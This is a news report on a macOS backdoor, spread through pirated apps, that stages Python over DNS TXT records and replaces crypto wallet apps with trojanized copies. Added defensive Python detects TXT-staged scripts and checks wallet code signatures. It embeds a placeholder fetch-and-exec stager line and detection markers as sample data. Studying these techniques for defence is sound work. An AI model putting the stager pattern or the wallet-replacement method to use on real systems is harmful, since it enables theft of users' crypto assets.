Wednesday 24 January 2024 – 11.04pm WIB
Jakarta – Kaspersky researchers have discovered an unconventional type of macOS malware. This previously unknown malicious software suite, covertly distributed via pirated apps, targets macOS users’ crypto assets, which are stored in digital wallets.
Unlike the proxy Trojans previously discovered by Kaspersky, this new threat focuses on compromising crypto wallets.
New macOS backdoor targets crypto asset wallets
This crypto-stealing Trojan is unusual in two ways. First, it uses DNS TXT records to deliver its malicious Python scripts. Second, it does not merely steal from crypto wallets: it replaces the wallet application itself with an infected version of the attackers' own.
That replacement lets the attackers steal the secret recovery phrases used to access the crypto assets held in the wallets.
The malware targets macOS 13.6 and later, on both Intel and Apple Silicon machines, indicating a focus on users of recent versions of the operating system.
The compromised disk images contained the sought-after "activator" alongside the application it was meant to unlock. The activator, which looks harmless at first glance, "activates" the compromised application after the user enters their password.
The attackers ship a pre-compromised version of the application, with its executable manipulated so that it does not work until the user runs the activator. This tactic ensures that users launch the trojanized component themselves, without knowing it.
After the patching step, the malware runs its main payload: it fetches the DNS TXT record of a domain controlled by the attackers and decrypts a Python script from it. That script loops endlessly, trying to download the next stage of the infection chain, which is also a Python script.
The purpose of that next payload is to execute arbitrary commands received from the server. Although no commands were received during the investigation, the backdoor was updated regularly, which shows that the campaign is still under active development.
The code suggests that such a command would most likely be a Python script.
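The DNS TXT staging and the endless polling loop described above leave traces in resolver or passive DNS logs. The following Python is an added example written for this page, not code from Kaspersky's report or from the malware: it reads constructed log lines (the stager name stager.example.invalid, the client addresses and the placeholder stage-one script are all invented) and flags three things: TXT answers that reassemble into a base64 blob decoding to Python source, long opaque TXT answers that do not decode to anything readable (what an encrypted stager like the one in the report looks like), and clients that keep re-resolving the same TXT name.

```python
import base64
import binascii
import re
from collections import Counter, defaultdict

# Constructed stand-in for the malware's first-stage Python script (a harmless
# placeholder, not code from the report). It mirrors the behaviour described
# above: loop forever, try to fetch the next stage, execute whatever comes back.
FAKE_STAGE_ONE = (
    b"import urllib.request\n"
    b"while True:\n"
    b"    try:\n"
    b"        exec(urllib.request.urlopen(NEXT_STAGE_URL).read())\n"
    b"    except Exception:\n"
    b"        pass\n"
)
_B64 = base64.b64encode(FAKE_STAGE_ONE).decode()

# Constructed resolver log lines: "<unix ts> <client> <qname> <qtype> <rdata>".
# stager.example.invalid is an invented name; its record is split over two TXT
# strings the way a long record is. The SPF and DKIM rows are benign controls.
SAMPLE_LOG = [
    f"1706112000 10.0.0.5 stager.example.invalid TXT {_B64[:100]}",
    f"1706112000 10.0.0.5 stager.example.invalid TXT {_B64[100:]}",
    "1706112001 10.0.0.5 example.com TXT v=spf1 include:_spf.example.com ~all",
    "1706112002 10.0.0.7 s1._domainkey.example.com TXT "
    "v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC7",
    f"1706112060 10.0.0.5 stager.example.invalid TXT {_B64[:100]}",
    f"1706112060 10.0.0.5 stager.example.invalid TXT {_B64[100:]}",
]

B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
PY_MARKERS = (b"import ", b"exec(", b"def ", b"while True", b"subprocess", b"urllib")


def parse_line(line):
    ts, client, qname, qtype, rdata = line.split(" ", 4)
    return {"ts": int(ts), "client": client, "qname": qname, "qtype": qtype, "rdata": rdata}


def txt_answers(lines):
    """Group TXT strings by (client, ts, qname): one lookup can return several."""
    groups = defaultdict(list)
    for r in map(parse_line, lines):
        if r["qtype"] == "TXT":
            groups[(r["client"], r["ts"], r["qname"])].append(r["rdata"])
    return groups


def try_decode(run):
    try:
        return base64.b64decode(run, validate=True)
    except (binascii.Error, ValueError):
        return None


def looks_like_python(data):
    """Mostly printable text containing at least two typical Python tokens."""
    if not data:
        return False
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in data)
    return printable / len(data) >= 0.95 and sum(m in data for m in PY_MARKERS) >= 2


def extract_scripts(lines):
    """(client, qname) -> decoded source, for TXT answers carrying plain-encoded Python."""
    found = {}
    for (client, _ts, qname), parts in txt_answers(lines).items():
        for run in B64_RUN.findall("".join(parts)):
            data = try_decode(run)
            if data is not None and looks_like_python(data):
                found[(client, qname)] = data
    return found


def long_opaque_txt(lines, min_len=150):
    """TXT answers carrying an unusually long base64-like blob, decodable or not.
    This is the signal that survives when the stager is encrypted, as in the report.
    DKIM keys are the main legitimate source of such blobs, so they are allowlisted."""
    hits = set()
    for (client, _ts, qname), parts in txt_answers(lines).items():
        joined = "".join(parts)
        if "_domainkey" in qname or joined.startswith("v=DKIM1"):
            continue
        if sum(len(run) for run in B64_RUN.findall(joined)) >= min_len:
            hits.add((client, qname))
    return sorted(hits)


def repeated_txt_lookups(lines, min_lookups=2):
    """Clients that resolve the same TXT name again and again (the polling pattern)."""
    counts = Counter((client, qname) for (client, _ts, qname) in txt_answers(lines))
    return sorted(k for k, n in counts.items() if n >= min_lookups)


if __name__ == "__main__":
    for key, src in extract_scripts(SAMPLE_LOG).items():
        print("encoded Python script in TXT answer:", key, src[:21])
    print("long opaque TXT answers:", long_opaque_txt(SAMPLE_LOG))
    print("repeated TXT lookups:", repeated_txt_lookups(SAMPLE_LOG))
```

The content check only fires when the staged script is merely encoded; the report says the real one is also encrypted, so on live traffic the length and repeat-lookup signals carry the weight, and the DKIM allowlist should be replaced by a baseline of the TXT names your own fleet legitimately resolves.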
In addition to the features described above, the script contains two notable functions involving the apple-analyzer[.]com domain.
These two functions check whether a cryptocurrency wallet application is installed and replace it with a version downloaded from that domain. The tactic appears to target the Bitcoin and Exodus wallets, turning the legitimate applications into trojanized copies.
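One check a defender can run against the wallet-replacement behaviour described above: a rebuilt copy of a wallet app cannot carry the vendor's original Developer ID signature, so comparing the installed bundle's Team ID with a baseline recorded from a known-good install catches the swap even when `codesign --verify` still passes (an ad-hoc re-signed bundle has an internally consistent seal). The Python below is an added example written for this page, not tooling from Kaspersky or from the wallet vendors; the install paths are assumed, the Team IDs, bundle identifier and signer name are placeholders, and the two `codesign -dvv` outputs are constructed.

```python
import subprocess

# Expected Team IDs, recorded by the operator from a known-good install with
# `codesign -dvv /Applications/<Wallet>.app`. The values here are placeholders,
# not the wallet vendors' real identifiers; the paths are assumed install paths.
EXPECTED_TEAM_ID = {
    "/Applications/Exodus.app": "EXAMPLETEAM1",
    "/Applications/Bitcoin-Qt.app": "EXAMPLETEAM2",
}

# Constructed `codesign -dvv` output for an untouched Developer ID signed bundle
# (bundle identifier and signer name invented for the example).
GOOD_DETAILS = """\
Executable=/Applications/Exodus.app/Contents/MacOS/Exodus
Identifier=com.example.wallet
Format=app bundle with Mach-O universal (x86_64 arm64)
Authority=Developer ID Application: Example Wallet Inc (EXAMPLETEAM1)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
TeamIdentifier=EXAMPLETEAM1
"""

# Constructed output for the same path after a rebuilt copy has been dropped in
# and ad-hoc signed. Its seal is internally consistent, so `codesign --verify`
# still succeeds; only the missing Developer ID chain and Team ID give it away.
TAMPERED_DETAILS = """\
Executable=/Applications/Exodus.app/Contents/MacOS/Exodus
Identifier=com.example.wallet
Format=app bundle with Mach-O universal (x86_64 arm64)
Signature=adhoc
TeamIdentifier=not set
"""


def parse_codesign_details(text):
    """Pull the Team ID and certificate chain out of `codesign -dvv` output."""
    info = {"team_id": None, "authorities": []}
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if not sep:
            continue
        if key == "TeamIdentifier" and value.strip() != "not set":
            info["team_id"] = value.strip()
        elif key == "Authority":
            info["authorities"].append(value.strip())
    return info


def assess(details, verify_ok, expected_team_id):
    """Return findings for one bundle; an empty list means it matches the baseline."""
    findings = []
    if not verify_ok:
        findings.append("codesign --verify failed: bundle contents modified")
    if details["team_id"] is None:
        findings.append("unsigned or ad-hoc signed: no Team ID")
    elif details["team_id"] != expected_team_id:
        findings.append(f"Team ID {details['team_id']} differs from baseline {expected_team_id}")
    if not any(a.startswith("Developer ID Application:") for a in details["authorities"]):
        findings.append("no Developer ID Application certificate in chain")
    return findings


def check_installed(path, expected_team_id):
    """Live check on a Mac: run codesign against the bundle and assess the result."""
    verify = subprocess.run(["codesign", "--verify", "--deep", "--strict", path],
                            capture_output=True, text=True)
    details = subprocess.run(["codesign", "-dvv", path], capture_output=True, text=True)
    # codesign prints the signing details on stderr, not stdout
    return assess(parse_codesign_details(details.stderr), verify.returncode == 0,
                  expected_team_id)


if __name__ == "__main__":
    for path, team in EXPECTED_TEAM_ID.items():
        print(path, check_installed(path, team) or "OK")
```

Run it on the Mac with the wallets installed; the constants at the top are only there to exercise `assess()` offline. An attacker who re-signs the replacement with a Developer ID of their own passes `--verify` and has a Team ID, which is why the comparison is against a recorded baseline rather than against "any Developer ID".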